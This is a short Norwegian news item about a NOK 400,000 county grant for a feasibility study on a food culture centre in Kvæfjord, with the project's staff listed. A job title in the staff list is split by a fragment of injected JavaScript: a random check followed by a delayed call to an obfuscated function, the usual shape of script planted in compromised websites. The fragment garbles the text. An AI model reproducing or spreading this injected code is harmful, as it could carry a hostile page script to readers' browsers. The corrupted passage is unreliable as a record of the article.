Kr. 400.000 til matkulturprosjekt

Kvæfjordjordbær

Torsdag 9. juni gjestet Fylkesråd for helse, kultur og næring, Willy Ørnebakk, Kvæfjord kommune. Gleden var stor når fylkesråden kunne avsløre nyheten om at de har bevilget kr. 400.000,- til forprosjektet «Matkultursenter i Kvæfjord».

Forprosjektet skal utrede muligheten for, og realismen i ønsket om å etablere et Matkultursenter i kommunen. Senteret skal ha lokalmat, lokal historie og lokale opplevelser som hovedingredienser. Målet er at forprosjektet skal gi svar på om ideen er bærekraftig og om det er vilje hos lokalt og regionalt næringsliv til å forplikte seg inn i en realisering, samt om det finnes risikovillig kapital som kan skytes inn i en oppstartsfase.

Les mer om forprosjektet i lenken hentet fra Harstad Tidende 13.06.2016 Matkulturprosjekt

Forprosjekt Matkultursenter i Kvæfjord.
Prosjekteier: Kvæfjord kommune
Prosjektleder: Ellen Eliseussen
Prosjektgruppen: Nils Arthur Geitanger (daglig leder Hoelstuen og BARK), Jan-Erik Kristoffersen (daglig leder Visit Harstad), Rolf Ingar Eggum (landom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andbruksrådgiver Kvæfjord kommune), samt 2 stk. gårdbrukere fra Kvæfjord.
Total kostnadsramme kr. 800.000,-